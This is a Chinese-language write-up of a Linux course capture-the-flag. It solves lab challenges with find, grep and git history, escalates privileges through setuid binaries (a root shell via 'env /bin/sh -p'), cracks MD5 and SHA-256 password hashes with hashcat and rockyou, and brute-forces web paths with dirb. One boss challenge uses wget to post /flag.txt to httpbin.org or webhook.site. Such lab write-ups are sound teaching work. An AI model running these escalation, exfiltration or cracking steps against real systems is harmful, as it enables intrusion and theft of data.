SCIST LINUX CTF Write Up

# SCIST LINUX CTF Write Up ## Linux🐧 ### lab-basic 首先用git指令把資料抓下來 ```bash= git clone https://github.com/kazmatw/Kazma-Linux-Course.git ``` 進入lab-basic資料夾，可以看到flag_part1，內容是第一部分的flag ```bash= cat ./flag_part1 ``` 剩下的應該在find_here裡 ```bash= ls -aR ./find_here ``` * ```-a``` 列出所有隱藏檔案 * ```-R``` 以遞迴的方式列出所有子目錄的內容在./find_here/1/2/3/.../99/100裡找到.flag_part2 ```bash= cat ./find_here/1/2/3/4/5/6/7/8/9/10/11/12/13/14/15/16/17/18/19/20/21/22/23/24/25/26/27/28/29/30/31/32/33/34/35/36/37/38/39/40/41/42/43/44/45/46/47/48/49/50/51/52/53/54/55/56/57/58/59/60/61/62/63/64/65/66/67/68/69/70/71/72/73/74/75/76/77/78/79/80/81/82/83/84/85/86/87/88/89/90/91/92/93/94/95/96/97/98/99/100/.flag_part2 ``` <font color="#e63946">好像還沒結束...?!</font> 往上一找，在./find_here/1/2/3/4/5/.,發現還有flag_part3 ```bash= cat ./find_here/1/2/3/4/5/.,/flag_part3 ``` 三部分合併成完整flag :::success Flag🚩: ||`flag{w3lc0m3_t0_th3_w0rld_0f_l1nux}`|| ::: ### lab-git 查看GitHub上的[Commit紀錄](https://github.com/kazmatw/Kazma-Linux-Course/commits/main/) 發現增加和刪除flag的紀錄， ![image](https://hackmd.io/_uploads/HJmgr4qekl.png) 進入Add git chal，flag就在flag.txt裡另一個方法是用git 在`Kazma-Linux-Course`裡查看日誌 ```bash= git log ``` 發現可能有這題的flag ``` commit 647fe5c46f2bdf43c9255c0d71e61098f007ad10 Author: kazma <kazmatw@gmail.com> Date: Sat Oct 19 08:30:33 2024 +0800 Remove git chal commit f5f4079bd3d5c403f63c806e51dab65a260c35d2 Author: kazma <kazmatw@gmail.com> Date: Sat Oct 19 08:29:40 2024 +0800 Add git chal ``` 切換到`Add git chal`的commit版本 ```bash= git checkout f5f4079bd3d5c403f63c806e51dab65a260c35d2 ``` 此時，`flag.txt`檔案出現了！ ```bash= ls cat flag.txt ``` :::success Flag🚩: ||`flag{git_can_time_travel}`|| ::: ~~所以說剩下的flag都在log裡找是不是比較快🤪~~ ### lab-grep 使用`find`和`grep`指令列出可能是flag的片段 ```bash= find ./maybe_here -type f -exec grep -E "\flag|\{|\_|\}" {} \; ``` * `find [directory] -exec [command] \;` 對於每個找到的檔案執行`-exec`後的內容 * `-type f` 只找檔案不找目錄 * `grep -E "\flag|\{|\_|\}"` 使用擴充版regex尋找含有`flag`、`{`、`_`或`}`的內容 :::info 可以使用此網站幫助理解shell指令： https://explainshell.com ::: 最後得到三個flag片段，合併後得到 :::success Flag🚩: ||`flag{M4st3r_0f_S34rch_4nd_M4tch1$_p0w3rfu11}`|| ::: ### lab-setuid-finds 先用docker設置和啟動容器 ```bash= sudo apt install docker.io sudo docker build -t finds . sudo docker run -it finds ``` 從題目猜要用find指令讀flag 用`which`指令找到`find`的位置為`/usr/local/bin/find` ```bash= which find ``` 查看find權限 ```bash= ls -l /usr/local/bin/find ``` 結果真的有s權限 ```markdown= -rwsr-xr-x 1 root root 204264 Oct 26 11:10 /usr/local/bin/find ``` 用find和cat得到flag ```bash= find / -type f -name "flag.txt" -exec cat {} \; ``` :::success Flag🚩: ||`flag{find_can_also_print!}`|| ::: ### lab-setuid-revs 和上題一樣，`rev`有s權限使用兩次rev得到原本flag ```bash= rev /flag.txt | rev ``` :::success Flag🚩: ||`flag{reverse_and_reverse_is_not_reverse}`|| ::: ### lab-setuid-dates 和上題一樣，`date`有s權限 ```bash= date -f /flag.txt ``` * -f 原本用來讀取含有日期的檔案，但現在充當`cat`來用 :::success Flag🚩: ||`flag{what_time_is_it?}`|| ::: ### lab-setuid-idks > idk idc IDGAF!!! 這次不能從題目找提示了😭😭😭 先用`find`找含有setuid權限的binaries ```bash= find / -user root -perm -4000 ``` 發現以下可使用： ``` /usr/bin/chsh /usr/bin/newgrp /usr/bin/passwd /usr/bin/su /usr/bin/gpasswd /usr/bin/mount /usr/bin/umount /usr/bin/chfn /usr/local/bin/env ``` 使用 https://gtfobins.github.io/ 尋找利用方法，發現只有`env`可利用 ```bash= env /bin/sh -p ``` * `/bin/sh` 開啟shell * `-p` 以`env`擁有的root權限執行 ```bash= cat /flag.txt ``` :::success Flag🚩: ||`flag{controls_the_environment_variable}`|| ::: ### lab-scripts 修改`wtf.sh` ```bash= vim wtf.sh ``` ```bash= #!/bin/bash for i in {1..60} do if [ $i -le 20 ]; then rar e "file$i.rar" elif [ $i -le 40 ]; then tar -zxvf "file$i.tar.gz" else unzip "file$i.zip" fi done ``` 給予執行權限並執行 ```bash= chmod +x ./wtf.sh ./wtf.sh ``` 得到60個文字檔 ```bash= find . "*.txt" -type f -exec grep "flag{" 2>/dev/null {} \; ``` * `2>/dev/null` 忽略所有錯誤輸出 :::success Flag🚩: ||`flag{now_you_can_script}`|| ::: ### lab-hashcat 先使用 https://www.tunnelsup.com/hash-analyzer 分析`hashes1.txt`的hash種類 ![image](https://hackmd.io/_uploads/rkHITYqe1x.png) 使用hashcat和rockyou.txt爆破 [kali內建rockyou.txt](https://www.kali.org/tools/wordlists/)，需先解壓縮 ```bash= sudo gunzip /usr/share/wordlists/rockyou.txt.gz ``` 執行hashcat指令 ```bash= hashcat -m 0 ./hashes1.txt /usr/share/wordlists/rockyou.txt ``` * `-m 0` 選擇模式，`0`為md5的代碼出現以下錯誤： ``` hashcat Device #1: Not enough allocatable device memory for this attack. ``` 關掉模擬機，記憶體改成4GB： ![image](https://hackmd.io/_uploads/rkH4aF5eyg.png) 重開機後就可以順利執行 ``` Dictionary cache built: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344392 * Bytes.....: 139921507 * Keyspace..: 14344385 * Runtime...: 2 secs d0763edaa9d9bd2a9516280e9044d885:monkey ``` `hashes2.txt`用一樣方法解 ![image](https://hackmd.io/_uploads/Bykbe5cekx.png) ```bash= hashcat -m 1400 ./hashes2.txt /usr/share/wordlists/rockyou.txt ``` ``` Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 4980b1f29fa32ff18c95d0ed931fd48e1ad43a729251d6eddb3cece705ed4d05:rockyou ``` :::success Flag🚩: ||`flag{monkey_rockyou}`|| ::: :::info 可以使用以下網站自動破解hash https://www.dcode.fr/hash-function https://crackstation.net/ ::: ## Boss😈 ### hw-boss 一樣先找所有有setuid權限的binaries ```hash= find / -user root -perm -4000 2>/dev/null ``` 發現有wget可以用詢問ChatGPT，得到兩種解法 #### 解一：儲存HTTP回應 ```hash= wget --post-file=/flag.txt https://httpbin.org/post -O response.txt cat response.txt ``` #### 解二：使用[webhook.site](https://webhook.site/)上傳檔案 ```bash= wget --post-file=/flag.txt https://webhook.site/some_random_id ``` 在瀏覽器上即可看到flag :::success Flag🚩: ||`flag{w93t_1s_p0weRfU1_6i3b3EcNUnJhbkrN}`|| ::: ### hw-bbooss 使用`dirb`爆破常見路徑 ```bash= dirb https://lab.scist.org:30003/ ``` 得到4條路徑 ``` ---- Scanning URL: https://lab.scist.org:30003/ ---- + https://lab.scist.org:30003/_data (CODE:200|SIZE:346) + https://lab.scist.org:30003/_database (CODE:200|SIZE:393) + https://lab.scist.org:30003/login (CODE:200|SIZE:594) + https://lab.scist.org:30003/Login (CODE:200|SIZE:594) ``` `/_data` 裡得到反過來的第二部分flag `/_database` 裡是以json形式呈現的admin帳號和密碼的hash 破解hash後得到密碼||`naruto`||，登入後得到第一部分flag :::success Flag🚩: ||`flag{ddddddd_iiiiiii_rrrrrrrr_bbbbbbbb}`|| ::: ## 其他 ### Terminal指令 * `Ctrl + a` 將游標一道最前面 * `Ctrl + e` 將游標一道最後面 * `Ctrl + u` 刪除游標前的內容 ### shell `>` redirect: 將輸出導向其他地方(覆蓋) ```bash= echo "Happy Halloween by Raga Man" > boo.txt ``` `>>` redirect: 將輸出導向其他地方(附加) ```bash= echo "STAB the BATS" >> boo.txt echo "ACT like a CAT" >> boo.txt echo "OWL flying LOW" >> boo.txt echo "TROLLS down the STROLL" >> boo.txt echo "SCARE? who CARES?" >> boo.txt echo "MONSTER? call the MENTORS!" >> boo.txt ``` `|` pipe: 前一個輸出當後一個輸入 ```bash= cat boo.txt | rev ``` ``` naM agaR yb neewollaH yppaH STAB eht BATS TAC a ekil TCA WOL gniylf LWO LLORTS eht nwod SLLORT ?SERAC ohw ?ERACS !SROTNEM eht llac ?RETSNOM ``` ## 後記 ![image](https://hackmd.io/_uploads/B1m60iqeyl.png) 題目全破，最後位居21名，但其實8成時間都在寫Write Up😅，然後我[迎新盃Write Up](https://hackmd.io/@Zantvish/NCKUCTF_Freshmen_Cup)還沒開始寫啊啊啊